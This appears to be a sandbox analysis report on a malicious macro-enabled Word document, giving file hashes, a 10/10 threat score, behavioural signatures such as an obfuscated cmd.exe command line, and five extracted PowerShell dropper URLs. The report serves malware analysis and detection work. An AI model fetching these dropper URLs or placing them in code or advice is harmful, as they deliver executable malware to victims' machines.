Overview

overview

10

Static

static

8

b32d967d7e...18.doc

windows7-x64

10

b32d967d7e...18.doc

windows10-2004-x64

10

Sharing

Copy URL Twitter E-mail

General

  • Target

    b32d967d7edc07d99b55230add746849_JaffaCakes118

  • Size

    84KB

  • Sample

    240616-m6yzqsvcpn

  • MD5

    b32d967d7edc07d99b55230add746849

  • SHA1

    ed64498d29f40ccc07c7fbfa2a0a05e29763f5e2

  • SHA256

    9a1eb53df4d78dc1896b3dfe00ed0818391b12593cebf80b71b48b3623c28de0

  • SHA512

    548c09142c363313c89229e08dc4555897ed8b153c15a5a89efc4d624dc6953b90c574b04e114e23d6866c549b18e64141493e826a577ebaecb59e031dbe04b3

  • SSDEEP

    768:hpJcaUitGAlmrJpmxlzC+w99NB55D+1od2rUPJcogB+/sDy1IDJynMviAgpLApk:hptJlmrJpmxlRw99NBj+aDKWWyndA

Score
10/10
macromacro_on_action

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://audioauthorities.com/9B0
exe.dropper

http://tandleaccountancy.co.uk/ZDSIM
exe.dropper

http://thecardz.com/NTGpsf
exe.dropper

http://xuatbangiadinh.vn/H
exe.dropper

http://xn--b1axgdf5j.xn--j1amh/a

Targets

    • Target

      b32d967d7edc07d99b55230add746849_JaffaCakes118

    • Size

      84KB

    • MD5

      b32d967d7edc07d99b55230add746849

    • SHA1

      ed64498d29f40ccc07c7fbfa2a0a05e29763f5e2

    • SHA256

      9a1eb53df4d78dc1896b3dfe00ed0818391b12593cebf80b71b48b3623c28de0

    • SHA512

      548c09142c363313c89229e08dc4555897ed8b153c15a5a89efc4d624dc6953b90c574b04e114e23d6866c549b18e64141493e826a577ebaecb59e031dbe04b3

    • SSDEEP

      768:hpJcaUitGAlmrJpmxlzC+w99NB55D+1od2rUPJcogB+/sDy1IDJynMviAgpLApk:hptJlmrJpmxlRw99NBj+aDKWWyndA

    Score
    10/10

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • An obfuscated cmd.exe command-line is typically used to evade detection.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks